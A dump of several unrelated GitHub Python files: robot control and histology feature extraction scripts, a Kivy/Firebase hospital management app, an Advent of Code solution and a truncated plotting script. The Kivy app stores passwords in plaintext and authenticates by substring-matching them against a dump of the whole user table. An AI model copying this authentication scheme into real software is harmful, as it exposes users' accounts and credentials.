tau_right]]))\n cli.talk()\n\n cli.set_setpoints(setpoints_type=CommandType.SPEED_CTRL,\n setpoints=np.hstack((v_left[:, None], v_right[:, None])))\n\n fig, axs, lines = cli.plot_measurements(interval=np.zeros(0, dtype=int))\n\n thread1 = threading.Thread(target=cli.talk)\n\n cli.talk()\n thread1.start()\n\n display_cnt = 0\n while thread1.is_alive():\n measurements_cnt = cli.measurements_cnt\n if display_cnt < measurements_cnt:\n cli.update_measurements(fig, axs, lines, interval=slice(display_cnt, measurements_cnt))\n display_cnt = measurements_cnt\n time.sleep(2)\n cli.close()\n if display_cnt < cli.measurements_cnt:\n cli.update_measurements(fig, axs, lines, interval=slice(display_cnt, cli.measurements_cnt))\n plt.show()\n","repo_name":"rafael-phd/SnifferRobotPy","sub_path":"test_speed_ctrl_w_pid.py","file_name":"test_speed_ctrl_w_pid.py","file_ext":"py","file_size_in_byte":1624,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"94"} +{"seq_id":"33583111075","text":"import json\nimport shutil\nfrom pathlib import Path\nfrom typing import Tuple\n\nimport hydra\nimport numpy as np\nimport yaml\nfrom hydra.core.hydra_config import HydraConfig\nfrom hydra.utils import instantiate\nfrom loguru import logger\nfrom omegaconf import DictConfig, OmegaConf\n\nfrom rl_benchmarks.models import ParallelExtractor\nfrom rl_benchmarks.utils import (\n extract_from_tiles,\n get_tile_config,\n set_seed,\n)\nfrom rl_benchmarks.constants import (\n AVAILABLE_COHORTS,\n PREPROCESSED_DATA_DIR,\n TILE_SIZES,\n)\n\n\n@hydra.main(\n version_base=None,\n 
config_path=\"../../conf/extract_features/\",\n config_name=\"tile_config\",\n)\ndef extract_tile_features(params: DictConfig) -> Tuple[np.ndarray, np.ndarray]:\n \"\"\"Perform feature extraction for a given dataset of images. The Hydra configuration\n file can be found in `conf/extract_features/tile_config.yaml`.\n See `conf/extract_features/tile_dataset` and `conf/extract_features/feature_extractor`\n for the list of available tiles datasets and feature extractors, respectively.\n \"\"\"\n # Set seed for features extraction (in case of random subsampling).\n set_seed()\n\n # Prepare output directory.\n features_output_dir = params[\"features_output_dir\"]\n dataset_cfg = params[\"tile_dataset\"]\n cohort = dataset_cfg[\"cohort\"]\n if features_output_dir is None:\n if cohort not in AVAILABLE_COHORTS:\n raise ValueError(\n f\"{cohort} is not found. Available cohorts can be found in\"\n \" ``rl_benchmarks.constants::AVAILABLE_COHORTS``.\"\n )\n else:\n features_output_dir = Path(features_output_dir)\n hydra_cfg = OmegaConf.to_container(HydraConfig.get().runtime.choices)\n feature_extractor_name = hydra_cfg[\"feature_extractor\"]\n # Features output directory.\n features_output_dir = (\n PREPROCESSED_DATA_DIR\n / \"tile_classification\"\n / \"features\"\n / feature_extractor_name\n / cohort\n )\n features_output_dir.mkdir(exist_ok=True, parents=True)\n logger.info(f\"Storage folder: {features_output_dir}.\")\n\n # Define parameters for features extraction process.\n dataset_cfg = params[\"tile_dataset\"]\n feature_extractor_cfg = params[\"feature_extractor\"]\n tile_size = params[\"tile_size\"]\n if tile_size == \"auto\":\n tile_size = TILE_SIZES[feature_extractor_name]\n else:\n assert (\n TILE_SIZES[feature_extractor_name] == tile_size\n ), f\"Please specify a tile size (in pixels) that matches the original implementation, see constants.TILE_SIZES dictionary for details: {TILE_SIZES}\"\n\n num_workers = params[\"num_workers\"]\n batch_size = params[\"batch_size\"]\n device = params[\"device\"]\n\n # Get slides paths.\n get_dataset = instantiate(dataset_cfg)\n dataset = get_dataset()\n\n # Save output configuration.\n hydra_cfg = hydra.core.hydra_config.HydraConfig.get()\n hydra_features_output_dir = Path(hydra_cfg[\"runtime\"][\"output_dir\"])\n hydra_yaml_cfg = hydra_features_output_dir / \".hydra\" / \"config.yaml\"\n\n with open(hydra_yaml_cfg, \"r\", encoding=\"utf-8\") as stream:\n hydra_yaml_cfg = yaml.safe_load(stream)\n\n output_cfg = get_tile_config(\n params,\n features_output_dir,\n tile_paths=list(dataset.image_path.values),\n tile_ids=list(dataset.image_id.values),\n hydra_yaml_cfg=hydra_yaml_cfg,\n )\n with open(\n features_output_dir / \"rlbenchmarks_extraction_params.json\",\n \"w\",\n encoding=\"utf-8\",\n ) as fp:\n json.dump(output_cfg, fp)\n\n shutil.copyfile(\n Path(__file__).resolve(),\n features_output_dir / \"rlbenchmarks_extraction_script.py\",\n )\n\n # Get features storage paths.\n tile_features_path = features_output_dir / \"tile_features.npy\"\n tile_ids_path = features_output_dir / \"tile_ids.npy\"\n\n if tile_features_path.exists():\n dataset_features = np.load(tile_features_path)\n if len(dataset) == len(dataset_features):\n logger.info(\n f\"Extraction already done. 
Features saved at: {tile_features_path}\"\n )\n\n # Instantiate feature extractor.\n extractor = instantiate(feature_extractor_cfg)\n extractor = ParallelExtractor(\n extractor,\n gpu=device,\n )\n\n # Extract features.\n tile_features, tile_ids = extract_from_tiles(\n dataset_tiles=dataset,\n feature_extractor=extractor,\n tile_size=tile_size,\n num_workers=num_workers,\n batch_size=batch_size,\n )\n\n # Save features and tiles ids.\n np.save(str(tile_features_path), tile_features)\n np.save(str(tile_ids_path), tile_ids)\n\n\nif __name__ == \"__main__\":\n extract_tile_features() # pylint: disable=no-value-for-parameter\n","repo_name":"owkin/HistoSSLscaling","sub_path":"tools/extract_features/extract_tile_features.py","file_name":"extract_tile_features.py","file_ext":"py","file_size_in_byte":4765,"program_lang":"python","lang":"en","doc_type":"code","stars":54,"dataset":"github-code","pt":"94"} +{"seq_id":"74498171510","text":"import json\nimport threading\n\nimport pyrebase\nimport requests\nfrom kivy.clock import Clock, mainthread\nfrom kivy.core.window import Window\nfrom kivy.lang import Builder\nfrom kivy.metrics import dp\nfrom kivy.uix.screenmanager import Screen, ScreenManager\nfrom kivymd.app import MDApp\nfrom kivymd.uix.datatables import MDDataTable\nfrom kivymd.uix.picker import MDDatePicker\n\nglobal firebaseConfig\nglobal firebase2 \nglobal lista2\nglobal HORARIOS_SELECIONADOS\n\nfirebaseConfig={\n \n#PUT THE KEYS TO YOUR FIREBASE DATABASE HERE\n\n};\n\n\nfirebase2 = pyrebase.initialize_app(firebaseConfig)\nlista2 = []\nHORARIOS_SELECIONADOS = [] \n\n\n# Redireciona para a tela de login\ndef callbackregister(self, *args):\n MDApp.get_running_app().root.current = 'login'\n\n# Cria o registro do usuario e posta as informações na base de dados do firebase (realtime database) \ndef create_post(self, nome, cpf, senha):\n #firebase_url = \" \" \n #auth_key = ' ' \n\n lista = []\n request = requests.get(self.firebase_url + '?auth=' + self.auth_key)\n res = json.dumps(request.json()) \n \n try: \n to_database = '{\"Nome\": 'f'{json.dumps(nome)}'', \"CPF\" : 'f'{json.dumps(cpf)}'', \"Senha\" : 'f'{json.dumps(senha)}''}'\n\n \n if nome == \"\":\n self.ids.lbregister.text = \"Insira nome\"\n\n elif cpf == \"\":\n self.ids.lbregister.text = \"Insira CPF\"\n\n elif senha == \"\":\n self.ids.lbregister.text = \"Insira Senha\" \n\n elif len(cpf) < 11:\n self.ids.lbregister.text = \"CPF inválido, tente novamente\"\n\n elif len(senha) < 10:\n self.ids.lbregister.text = \"Senha precisa de pelo menos 10 caracteres\" \n\n elif cpf in res:\n self.ids.lbregister.text = \"CPF já cadastrado\"\n\n else:\n #requests.post(url = self.firebase_url, json = to_database2)\n requests.post(url = self.firebase_url, json = json.loads(to_database))\n\n self.ids.lbregister.text = \"Cadastrado com sucesso! 
Redirecionando para a tela de login...\"\n Clock.schedule_once(self.callbackregister, 3)\n\n\n lista.append(nome)\n lista.append(cpf)\n lista.append(senha)\n\n \n with open(f'{cpf}.txt',\"w\") as a:\n a.write(str(lista[0]))\n a.write(\"\\n\")\n a.write(str(lista[1]))\n a.write(\"\\n\")\n a.write(str(lista[2]))\n \n except ValueError:\n pass \n\n lista.clear\n\n# Redireciona para o dashboard\ndef callbacklogin(self, *args):\n MDApp.get_running_app().root.current = 'dashboard'\n\n \n# Autentica o usuario de acordo com as informações que são coletadas do banco de dados firebase\ndef get_post(self, cpf, senha):\n request = requests.get(self.firebase_url + '?auth=' + self.auth_key)\n res = json.dumps(request.json()) \n \n \n if (cpf != '' and senha != ''):\n if (len(cpf) == 11 and cpf in res) and (len(senha) >= 10 and senha in res):\n self.ids.lblogin.text = \"Logado com sucesso! Redirecionando para a tela inicial...\" \n Clock.schedule_once(self.callbacklogin, 3)\n nome = list(open(f'{cpf}.txt', \"r\"))\n nome = nome[0]\n id = list(open(f'{cpf}.txt', \"r\"))\n id = id[2]\n with open(\"autenticado.txt\", \"w\") as f: \n f.write(str(nome))\n f.write(str(cpf))\n f.write(\"\\n\")\n f.write(str(id)) \n\n else: \n self.ids.lblogin.text = \"CPF ou senha inválidos, tente novamente\" \n\n\n else: \n if(cpf == ''):\n self.ids.lblogin.text = \"Insira o CPF logar\"\n\n elif(senha == ''):\n self.ids.lblogin.text = \"Insira a senha para logar\"\n\n\n elif (cpf == '' and senha == ''):\n self.ids.lblogin.text = \"Insira os dados para logar\" \n\n\n# Redefine senha \n\ndef redf_passwd(self, cpf, senha):\n request = requests.get(self.firebase_url + '?auth=' + self.auth_key)\n res = json.dumps(request.json()) \n \n if cpf == \"\":\n self.ids.lbredfsenha.text = \"Insira o cpf\"\n elif cpf not in res:\n self.ids.lbredfsenha.text = \"CPF não cadastrado\"\n elif len(cpf) < 11:\n self.ids.lbredfsenha.text = \"CPF Inválido\"\n elif senha == \"\": \n self.ids.lbredfsenha.text = \"Insira a nova senha\"\n elif len(senha) < 10:\n self.ids.lbredfsenha.text = \"Senha precisa ter pelo menos 10 caracteres\"\n \n else:\n db = firebase2.database()\n user = db.child(\"Users\").get()\n for usuario in user.each():\n if usuario.val()['CPF'] == f'{cpf}' :\n db.child(\"Users\").child(usuario.key()).update({'Senha': f'{senha}'})\n a = open(f'{cpf}.txt', \"r\")\n list_of_lines = a.readlines() \n list_of_lines[2] = f'{senha}'\n a = open(f'{cpf}.txt', \"w\")\n a.writelines(list_of_lines) \n a.close()\n \n self.ids.lbredfsenha.text = \"Senha redefinida com sucesso!\"\n\n\n# Edita as informações do usuário \n\ndef change_screen(self, nome, cpf, id):\n nome2 = list(open(\"autenticado.txt\", \"r\"))\n nome2 = nome2[0]\n cpf2 = list(open(\"autenticado.txt\", \"r\"))\n cpf2 = cpf2[1]\n id2 = list(open(\"autenticado.txt\", \"r\"))\n id2 = id2[2]\n \n\n db = firebase2.database()\n user = db.child(\"Users\").get()\n for usuario in user.each():\n if usuario.val()['Nome'] in nome2:\n if f'{nome}' != \"\":\n db.child(\"Users\").child(usuario.key()).update({'Nome': f'{nome}'})\n \n f = open(\"autenticado.txt\", \"r\")\n list_of_lines = f.readlines() \n list_of_lines[0] = f'{nome}\\n'\n f = open(\"autenticado.txt\", \"w\")\n f.writelines(list_of_lines) \n f.close()\n self.ids.lbchange.text = \"Nome alterado com sucesso!\"\n\n \n if usuario.val()['CPF'] in cpf2:\n if f'{cpf}' != \"\":\n db.child(\"Users\").child(usuario.key()).update({'CPF': f'{cpf}'})\n\n a = open(\"autenticado.txt\", \"r\")\n list_of_lines = a.readlines() \n list_of_lines[1] = 
f'{cpf}\\n'\n a = open(\"autenticado.txt\", \"w\")\n a.writelines(list_of_lines) \n a.close()\n self.ids.lbchange.text = \"CPF alterado com sucesso!\"\n \n\n if usuario.val()['Senha'] in id2:\n if f'{id}' != \"\":\n db.child(\"Users\").child(usuario.key()).update({'Senha': f'{id}'})\n\n b = open(\"autenticado.txt\", \"r\")\n list_of_lines = b.readlines() \n list_of_lines[2] = f'{id}\\n'\n b = open(\"autenticado.txt\", \"w\")\n b.writelines(list_of_lines) \n b.close()\n self.ids.lbchange.text = \"ID alterado com sucesso!\"\n\n self.ids.lbchange.text = \"Dados alterados com sucesso!\"\n \n with open(f'{cpf}.txt', \"w\") as op:\n op.write(str(nome))\n op.write(\"\\n\")\n op.write(str(cpf))\n op.write(\"\\n\")\n op.write(str(id))\n\n\n# Salva a data escolhida pelo usuario\ndef on_save(self, instance, value, date_range):\n self.ids.data.text = str(value) \n\n# Mostra a mensagem quando o usuario cancela a data\ndef on_cancel(self, instance, value):\n self.ids.data.text = \"Você cliclou em cancelar\"\n\n# Cria o calendario\ndef show_data_picker(self):\n date_dialog = MDDatePicker(year=2022, month=6, day=17)\n date_dialog.bind(on_save=self.on_save, on_cancel=self.on_cancel)\n date_dialog.open() \n\n\n# Cria a consulta e salva no banco de dados firebase\ndef check(self, especialidade, data, paciente):\n #firebase_url = \" \" \n #firebase_url2 = \" \" \n\n #auth_key = ' '\n\n request = requests.get(self.firebase_url + '?auth=' + self.auth_key)\n res = json.dumps(request.json()) \n\n request2 = requests.get(self.firebase_url2 + '?auth=' + self.auth_key)\n res2 = json.dumps(request2.json()) \n\n if especialidade == \"\":\n self.ids.lbcheckin.text = \"Insira a especialidade\"\n elif paciente not in res2:\n self.ids.lbcheckin.text = \"Paciente não registrado\"\n elif paciente == \"\":\n self.ids.lbcheckin.text = \"Insira ID do paciente\"\n\n else:\n to_database = '{\"Especialidade\": 'f'{json.dumps(especialidade)}'', \"Data\": 'f'{json.dumps(data)}'', \"ID do paciente\": 'f'{json.dumps(paciente)}''}' \n db = firebase2.database()\n pacients = db.child(\"Pacients\").get()\n for paciente2 in pacients.each():\n if paciente2.val()['ID Paciente'] == f'{paciente}':\n db.child(\"Pacients\").child(paciente2.key()).update({'Tipo de tratamento' : f'{especialidade}'}) \n\n try:\n \n requests.post(url = self.firebase_url, json = json.loads(to_database))\n self.ids.lbcheckin.text = \"Consultada agendada com sucesso!\"\n\n\n except ValueError:\n pass \n\n\ndef on_save2(self, instance, value, date_range):\n self.ids.data.text = str(value) \n\ndef on_cancel2(self, instance, value):\n self.ids.data.text = \"Você cliclou em cancelar\"\n\ndef show_data_picker2(self):\n date_dialog = MDDatePicker(year=2022, month=6, day=17)\n date_dialog.bind(on_save=self.on_save2, on_cancel=self.on_cancel2)\n date_dialog.open() \n\n# Cria a retirada de medicamentos \n\ndef checkout(self, med, data, paciente2):\n #firebase_url = \" \" \n #firebase_url2 = \" \"\n #firebase_url3 = \" \"\n #auth_key = ' '\n \n request = requests.get(self.firebase_url3 + '?auth=' + self.auth_key)\n res = json.dumps(request.json()) \n request2 = requests.get(self.firebase_url2 + '?auth=' + self.auth_key)\n res2 = json.dumps(request2.json()) \n\n if med not in res2:\n self.ids.lbcheckout.text = \"Medicamento fora de estoque\"\n elif med == \"\":\n self.ids.lbcheckout.text = \"Insira nome do medicamento \"\n elif paciente2 not in res:\n self.ids.lbcheckout.text = \"Paciente não registrado\"\n elif paciente2 == \"\":\n self.ids.lbcheckout.text = \"Insira ID do 
paciente\"\n\n else:\n to_database = '{\"Medicamento\": 'f'{json.dumps(med)}'', \"Data\": 'f'{json.dumps(data)}'', \"ID Paciente\": 'f'{json.dumps(paciente2)}''}'\n #to_database1 = '{\"Data\": 'f'{data}''}'\n\n try:\n requests.post(url = self.firebase_url, json = json.loads(to_database))\n self.ids.lbcheckout.text = \"Retirada agendada com sucesso!\"\n #requests.post(url = self.firebase_url, json = json.dumps(to_database1))\n\n except ValueError:\n pass \n\n\n# Cria o estoque de medicamentos (entrada e saida dos mesmos)\n\ndef create_post_meds(self, nome_med, quantidade, id_med):\n #firebase_url = \" \" \n #auth_key = ' ' \n request = requests.get(self.firebase_url + '?auth=' + self.auth_key)\n res = json.dumps(request.json()) \n \n if nome_med == \"\":\n self.ids.lbmeds.text = \"Insira medicamento\"\n elif quantidade == \"\":\n self.ids.lbmeds.text = \"Insira quantidade maior que 0\"\n elif id_med == \"\":\n self.ids.lbmeds.text = \"Insira o id do med\" \n\n else:\n try: \n to_database = '{\"Nome do medicamento\": 'f'{json.dumps(nome_med)}'', \"Quantidade\" : 'f'{json.dumps(quantidade)}'', \"ID medicamento\" : 'f'{json.dumps(id_med)}''}'\n\n requests.post(url = self.firebase_url, json = json.loads(to_database))\n\n self.ids.lbmeds.text = \"Medicamento adicionado ao estoque!\" \n\n except ValueError:\n pass \n\n lista2.append(int(quantidade)) \n\n with open(\"meds.txt\", \"a\") as fp:\n for item in lista2:\n fp.write(\"%d\\n\" % item) \n\n\ndef create_delete(self, nome_med, quantidade, id_med):\n #firebase_url = \" \" \n #auth_key = ' '\n \n request = requests.get(self.firebase_url + '?auth=' + self.auth_key)\n res = json.dumps(request.json()) \n \n to_database = '{\"Nome do medicamento\": 'f'{json.dumps(nome_med)}'', \"Quantidade\" : 'f'{json.dumps(quantidade)}'', \"ID medicamento\" : 'f'{json.dumps(id_med)}''}'\n\n if nome_med == \"\":\n self.ids.lbmeds.text = \"Insira medicamento\"\n elif quantidade == \"\":\n self.ids.lbmeds.text = \"Insira quantidade maior que 0\"\n elif id_med == \"\":\n self.ids.lbmeds.text = \"Insira o id do med\" \n\n else:\n\n with open(\"meds.txt\", \"r\") as fp:\n conteudo = fp.readlines()\n for conteudos in conteudo:\n lista2.append(int(conteudos)) \n fp.close() \n\n new_quant = (lista2[int(id_med)] - int(quantidade)) \n\n db = firebase2.database()\n meds = db.child(\"Meds\").get()\n for meds2 in meds.each():\n if meds2.val()['ID medicamento'] == f'{id_med}':\n db.child(\"Meds\").child(meds2.key()).update({'Quantidade' : f'{new_quant}'}) \n\n a = open(\"meds.txt\", \"r\")\n list_of_lines = a.readlines() \n list_of_lines[int(id_med)] = f'{new_quant}\\n'\n a = open(\"meds.txt\", \"w\")\n a.writelines(list_of_lines) \n a.close()\n\n self.ids.lbmeds.text = \"Medicamento retirado do estoque\" \n\n\n# Cria tabela e lista os medicamentos\n\nstop = threading.Event()\n\ndef on_stop(self):\n self.stop.set()\n\ndef on_enter(self):\n self.start_second_thread()\n\ndef start_second_thread(self):\n threading.Thread(target=self.load_data).start()\n\ndef load_data(self, *args): \n get_request = requests.get(f' ')\n consultas_data = json.loads(get_request.content.decode())\n\n count = 0\n cols = [\"Código\"]\n values = []\n for consultas, dado in consultas_data.items():\n lista = []\n lista.append(consultas)\n\n for key, info in dado.items():\n lista.append(info)\n \n if count == 0:\n cols.append(key) \n count+=1 \n values.append(lista)\n\n self.data_table(cols, values) \n\n \n@mainthread\ndef data_table(self, cols, values): \n self.data_tables = MDDataTable( \n 
pos_hint={'center_y': 0.5, 'center_x': 0.5},\n size_hint=(0.9, 0.6),\n column_data=[\n (col, dp(40))\n for col in cols \n ],\n row_data=values,\n check=True\n ) \n\n self.add_widget(self.data_tables)\n\n# Mostra os dados sobre o usuário\n\ndef on_enter2(self):\n #firebase_url = \" \" \n auth_key = ' ' \n \n nome = list(open('autenticado.txt', 'r'))\n nome = nome[0]\n cpf = list(open('autenticado.txt', 'r'))\n cpf = cpf[1]\n id = list(open('autenticado.txt', 'r')) \n id = id[2]\n self.ids.cpffuncionario.text = cpf \n self.ids.nomefuncionario.text = nome\n self.ids.idfuncionario.text = id\n\n\n# Registra os pacientes e coloca os dados diretamente no banco de dados firebase\n\ndef callbackregisterpacientes(self, *args):\n MDApp.get_running_app().root.current = 'login'\n\ndef create_post_pacient(self, nome2, cpf2, senha2):\n #firebase_url = \" \"\n #auth_key = ' ' \n request = requests.get(self.firebase_url + '?auth=' + self.auth_key)\n res = json.dumps(request.json()) \n \n try: \n to_database = '{\"Nome\": 'f'{json.dumps(nome2)}'', \"CPF\" : 'f'{json.dumps(cpf2)}'', \"ID Paciente\" : 'f'{json.dumps(senha2)}''}'\n\n\n if len(cpf2) != 11:\n self.ids.lbregister_pacient.text = \"CPF inválido, tente novamente\"\n\n elif len(cpf2) < 10:\n self.ids.lbregister_pacient.text = \"Senha precisa de pelo menos 10 caracteres\" \n\n elif cpf2 in res:\n self.ids.lbregister_pacient.text = \"CPF já cadastrado\"\n\n else:\n #requests.post(url = self.firebase_url, json = to_database2)\n requests.post(url = self.firebase_url, json = json.loads(to_database))\n\n self.ids.lbregister_pacient.text = \"Paciente cadastrado com sucesso!\"\n\n except ValueError:\n pass \n\n# Registra horários de plantão e coloca os dados diretamente no banco de dados firebase\n\ndef callbackplantao(self, *args):\n MDApp.get_running_app().root.current = 'login'\n\ndef on_save3(self, instance, value, date_range):\n self.ids.data2.text = f'{str(date_range[0])} - {str(date_range[-1])}'\n\ndef on_cancel3(self, instance, value):\n self.ids.data2.text = \"Você cliclou em cancelar\"\n\ndef show_data_picker3(self):\n date_dialog = MDDatePicker(mode=\"range\")\n date_dialog.bind(on_save=self.on_save3, on_cancel=self.on_cancel3)\n date_dialog.open() \n\ndef create_post_hour(self, cpf_funcionario, data2, horario):\n request = requests.get(self.firebase_url2 + '?auth=' + self.auth_key)\n res = json.dumps(request.json()) \n \n if cpf_funcionario not in res:\n self.ids.lbregister_hour.text = \"CPF não cadastrado\" \n\n elif horario == \"\":\n self.ids.lbregister_hour.text = \"Insira horário\"\n\n else:\n\n try: \n to_database = '{\"CPF funcionario\": 'f'{json.dumps(cpf_funcionario)}'', \"Data\" : 'f'{json.dumps(data2)}'', \"Horario\" : 'f'{json.dumps(horario)}''}'\n\n\n \n requests.post(url = self.firebase_url, json = json.loads(to_database))\n self.ids.lbregister_hour.text = \"Horario adicionado com sucesso!\"\n\n except ValueError:\n pass \n\n\n# Cria tabela que mostra consultadas agendadas \n\nstop2 = threading.Event()\n\ndef on_stop2(self):\n self.stop2.set()\n\ndef on_enter4(self):\n self.start_second_thread()\n\ndef start_second_thread2(self):\n threading.Thread(target=self.load_data).start()\n\ndef load_data2(self, *args): \n #get_request = requests.get(f' ')\n consultas_data = json.loads(get_request.content.decode())\n\n count = 0\n cols = [\"Código\"]\n values = []\n for consultas, dado in consultas_data.items():\n lista = []\n lista.append(consultas)\n\n for key, info in dado.items():\n lista.append(info)\n \n if count == 0:\n 
cols.append(key) \n count+=1 \n values.append(lista)\n\n self.data_table(cols, values) \n\n \n@mainthread\ndef data_table2(self, cols, values): \n self.data_tables = MDDataTable( \n pos_hint={'center_y': 0.5, 'center_x': 0.5},\n size_hint=(0.9, 0.6),\n column_data=[\n (col, dp(40))\n for col in cols \n ],\n row_data=values,\n check=True\n ) \n\n self.add_widget(self.data_tables)\n\n\n# Cria tabela que mostra retirada de medicamentos agendadas\n\nstop3 = threading.Event()\n\ndef on_stop3(self):\n self.stop3.set()\n\ndef on_enter5(self):\n self.start_second_thread()\n\ndef start_second_thread3(self):\n threading.Thread(target=self.load_data).start()\n\ndef load_data3(self, *args): \n get_request = requests.get(f' ')\n consultas_data = json.loads(get_request.content.decode())\n\n count = 0\n cols = [\"Código\"]\n values = []\n for consultas, data in consultas_data.items():\n lista = []\n lista.append(consultas)\n\n for key, info in data.items():\n lista.append(info)\n if count == 0:\n cols.append(key) \n count+=1 \n values.append(lista)\n\n self.data_table(cols, values) \n\n@mainthread\ndef data_table3(self, cols, values):\n self.data_tables = MDDataTable( \n pos_hint={'center_y': 0.5, 'center_x': 0.5},\n size_hint=(0.9, 0.6),\n column_data=[\n (col, dp(40))\n for col in cols \n ],\n row_data=values,\n check=True\n ) \n\n self.add_widget(self.data_tables) \n\n\n# Cria tabela que mostra horarios de plantão e remove horarios\n\n\nstop4 = threading.Event()\n\ndef on_stop4(self):\n self.stop4.set()\n\ndef on_enter6(self):\n self.start_second_thread()\n\ndef start_second_thread4(self):\n threading.Thread(target=self.load_data).start()\n\ndef load_data4(self, *args): \n #firebase_url = \" \"\n #auth_key = ' ' \n if HORARIOS_SELECIONADOS:\n for h_horarios in HORARIOS_SELECIONADOS:\n post_request = requests.delete(f'/{h_horarios}/.json')\n\n get_request = requests.get(f' ')\n horarios_dado = json.loads(get_request.content.decode()) \n count = 0\n cols = [\"Código\"]\n values = []\n try:\n\n for horarios, dado in horarios_dado.items():\n lista = []\n lista.append(horarios)\n\n for key, info in dado.items():\n lista.append(info)\n if count == 0:\n cols.append(key) \n count+=1 \n values.append(lista)\n \n except AttributeError:\n pass \n\n self.data_table(cols, values) \n\ndef on_check_press(self, instance_table, current_row):\n\n '''Called when the check box in the table row is checked.'''\n if current_row[0] in HORARIOS_SELECIONADOS:\n HORARIOS_SELECIONADOS.remove(current_row[0])\n else:\n HORARIOS_SELECIONADOS.append(current_row[0])\n\n\n@mainthread\ndef data_table4(self, cols, values): \n\n self.data_tables = MDDataTable( \n pos_hint={'center_y': 0.5, 'center_x': 0.5},\n size_hint=(0.9, 0.6),\n column_data=[\n (col, dp(40))\n for col in cols \n ],\n row_data=values,\n check=True\n ) \n\n self.data_tables.bind(on_check_press=self.on_check_press)\n self.add_widget(self.data_tables) \n\n\n# Cria tabela que mostra os pacientes registrados\n\nstop5 = threading.Event()\n\ndef on_stop(self):\n self.stop5.set()\n\ndef on_enter7(self):\n self.start_second_thread()\n\ndef start_second_thread5(self):\n threading.Thread(target=self.load_data).start()\n\ndef load_data5(self, *args): \n get_request = requests.get(f' ')\n pacientes_data = json.loads(get_request.content.decode())\n\n count = 0\n cols = [\"Código\"]\n values = []\n for pacientes, data in pacientes_data.items():\n lista = []\n lista.append(pacientes)\n\n for key, info in data.items():\n lista.append(info)\n if count == 0:\n cols.append(key) \n 
count+=1 \n values.append(lista)\n\n self.data_table(cols, values) \n\n@mainthread\ndef data_table5(self, cols, values):\n self.data_tables = MDDataTable( \n pos_hint={'center_y': 0.5, 'center_x': 0.5},\n size_hint=(0.9, 0.6),\n column_data=[\n (col, dp(40))\n for col in cols \n ],\n row_data=values,\n check=True\n ) \n\n self.add_widget(self.data_tables) \n","repo_name":"IsabellaSampaio/mobileapp-python-kivy","sub_path":"KivyApp/functions.py","file_name":"functions.py","file_ext":"py","file_size_in_byte":20680,"program_lang":"python","lang":"pt","doc_type":"code","stars":62,"dataset":"github-code","pt":"94"} +{"seq_id":"5291079249","text":"#! env python\n\nimport itertools\nimport functools\nimport os \n\ndir_path = os.path.dirname(os.path.realpath(__file__))\n\ndef main():\n needed = 0\n with open(dir_path + \"/input.txt\") as f:\n for line in f.readlines():\n l,w,h = line.split('x')\n l,w,h = int(l), int(w), int(h)\n needed += 2*l*w + 2*w*h + 2*h*l\n needed += min(l*w, w*h, h*l)\n\n print(needed)\n\nif __name__ == \"__main__\":\n main()","repo_name":"okigan/adventofcode","sub_path":"2015/day02/day02a.py","file_name":"day02a.py","file_ext":"py","file_size_in_byte":445,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"94"} +{"seq_id":"13163479787","text":"\"\"\"\nPlotting\nThis script contains functions for\n1) Plotting results of statistical test\n - plot_test()\n2) Plotting final thesis figures\n - final_figure()\n - correlation_figure()\n3) Plotting figure subplots\n - plot_extracted_spikes()\n - plot_frames_lfp()\n - plot_frames_MUAe()\n - plot_cors()\n - plot_inter_cors()\n - plot_pca()\n - plot_spont_map()\n - plot_ori_map()\n - plot_hist()\n\nAuthors: Matěj Voldřich\n\"\"\"\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport os\nimport pickle\nimport helper\nimport quantities as pq\n\n\ndef plot_test(params, tag):\n \"\"\"\n Plot and save generated spontaneous map, orientation map, test results for\n each (interpolated) channel and overall test result.\n\n :param params: analysis parameters\n :param tag: test result tag\n :return:\n \"\"\"\n respath = os.path.join(params['results_path'], f\"testing_results_{tag}_{params['remove_PCA_dims']}.pkl\")\n with open(respath, \"rb\") as f:\n result = pickle.load(f)\n\n if params[\"control_type\"] == \"orientation\":\n orientations = result[\"test\"]\n spont_map = result[\"reference\"]\n else:\n orientations = result[\"reference\"]\n spont_map = result[\"test\"]\n\n monkey = tag[0]\n plt.figure(figsize=(13, 12))\n # spontaneous map\n plt.suptitle(f\"Testing results {tag}\")\n cmap = params['map_colorscheme']\n cmap = plt.get_cmap(cmap)\n cmap.set_under('lightgray')\n cmap.set_over('lightgray')\n plt.subplot(2, 2, 1)\n plt.title(f\"Spontaneous map (PCA dims [{params['remove_PCA_dims']}, {params['remove_PCA_dims'] + 1}])\")\n plt.pcolormesh(spont_map, cmap=cmap, vmin=0)\n\n # orientations\n plt.subplot(2, 2, 2)\n plt.title(f\"{monkey}{result['Array_ID']} orientations\")\n plt.pcolormesh(orientations, cmap=cmap, vmin=0)\n\n # percentiles\n plt.subplot(2, 2, 3)\n plt.title(f\"Scores percentile ({len(result['control_scores'])} controls)\")\n cmap = plt.get_cmap(\"RdBu\")\n cmap.set_under('lightgray')\n cmap.set_over('lightgray')\n plt.pcolormesh(result['percentiles'], cmap=cmap, vmin=0, vmax=100)\n\n # histogram\n plt.subplot(2, 2, 4)\n plt.title(f\"Mean score ({result['percentile']})\")\n h = plt.hist(result['control_scores'], bins=int(params['permutations'] / 20))[0]\n map_score = 
result['test_score']\n g = plt.plot([map_score, map_score], [0, 20], color=\"orange\")[0]\n x, y = helper.KDE(result['control_scores'], 1)\n y = y / np.max(y) * np.max(h)\n plt.plot(x, y)\n plt.legend([g], [\"Mean test score\"])\n\n plt.savefig(\n f\"{params['figures_path']}/testing/{result['method']}/{monkey}{result['Array_ID']}_{result['method']}_{params['remove_PCA_dims']}_{params['control_type'][0]}\")\n plt.close()\n\n\n# Figures in detailed analysis of L13\n# figure a) - signal, spikes, frames (MUA and nLFP)\ndef plot_extracted_spikes(bl, fs, binsize, dur=1):\n \"\"\"\n Plot frame extraction for MUA or nLFP\n :return:\n \"\"\"\n # SETUP\n chn_ix = np.random.randint(64)\n t_start = 33\n\n y = bl.segments[0].analogsignals[0][t_start * fs:int((t_start + dur) * fs), chn_ix]\n y = y / max(y.max(), np.abs(y.min()))\n t_start = t_start * pq.s\n\n # 1. plot signal with threshold\n offset = 3.5\n signal = y + offset\n x = np.linspace(0, len(signal) / fs, len(signal))\n plt.plot(x, signal, color=\"black\")\n plt.plot([0, x[-1]], [np.mean(signal), np.mean(signal)], color=\"grey\")\n # plt.plot([0, x[-1]], [y_th, y_th], color=\"red\", linestyle=\"dashed\")\n\n # 2. extracted spikes\n st = 